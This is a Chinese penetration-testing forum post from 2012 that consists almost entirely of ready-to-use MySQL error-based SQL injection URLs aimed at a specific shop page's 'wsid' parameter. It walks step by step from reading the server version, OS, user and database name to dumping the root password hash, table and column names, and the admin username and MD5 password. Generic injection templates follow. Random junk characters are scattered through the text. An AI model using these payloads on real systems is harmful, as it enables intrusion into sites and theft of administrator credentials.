找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1978|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
$ ]3 l2 r2 g& u) ~4 jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 ]9 V! R4 f! R0 j  ^6 x  n& S. n2 X2 T
判断系统
/ y2 \$ K. }/ j% F9 l8 d( T
/ `. n7 h  o. Z3 G% j& F& T. Lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  w% V; k: ^$ W; n2 W/ y% d9 d; ~+ k& k& {) n) `7 ~
* F4 F" G. ~5 j$ `6 ]2 @+ j
& P- P" y  O, w8 C; @
当前 user()- g, q& [7 Z/ b+ p
4 {. A4 Y; g' q: j8 t- z' ^" |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! f2 J4 h# h" `3 _1 i8 j

& s  U( I$ w7 Z" v: F, j7 H! `' M$ P3 T4 N4 H3 b* o8 h

! @1 o. F! U( A+ P当前 database()
4 [: H* h$ S2 ~: P& shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) b, W) [) p( o2 v  l

6 {9 n. E7 f  [' `- p7 h% E% K$ D4 ~& P& b1 z! @0 j3 o
! L+ b4 k6 q8 Q0 i4 L; z+ I9 n# a

) _; `$ Y: R" g' V% troot hash
- _; D. n9 r1 k9 v# Q+ l& ~" P$ o* Y2 M
* i, g+ T! N9 S1 \3 P. F: U  m- _2 `4 Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 n% P. p5 |" Y1 f1 j' T/ G0 F) \
* W, Q3 }! ~' x# ?" L
) S6 R' A: P5 l) W* q6 ^: l
( i- s1 M3 n. b3 f7 O: P
当前 数据库表名
9 A1 r0 r2 ?1 X# Q
: S% F. Y( U8 E( Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 L- ^; R0 O9 j% A$ l
; f+ D  P( e8 b
, O& f2 X, @- K( M' i- ~# l9 n/ _- O% K$ u
当前 数据库 user_name 字段
% t6 {: E) g7 v
( i  f) Z( H& L! n5 Zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23- Q0 n! G6 T0 E8 P; N/ ]  B
+ e' }  R5 I1 M2 z
当前 数据库 字段 password6 J  w; A) p5 Y( j% _, v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ o- J) U% r9 ~4 {9 S  F7 W, c
1 }, J+ C$ q% e8 l5 `3 e) n* [

7 G' P5 B7 S: \6 \4 s% m
  m7 `8 Q! n: }* l获得 admin passwd(md5)
: }! y8 d+ q$ G- J: m. ]/ C( z1 e' p: @) @

& F' L9 U* Z1 x" H( o. bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 k- D4 W- j& s2 ]+ n( t" b

8 a7 E/ R' ?" z% `5 F( k% P; M报错注射
, G% [* f6 M7 B6 Y' C0 SSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)' y8 s- K1 U1 V6 X  S

7 Q" j2 N* l& d2 [SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)( i# s' |% |- Q2 ^0 L+ C& r9 p% P
. x# u- I, y2 G; _# [1 j7 }
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表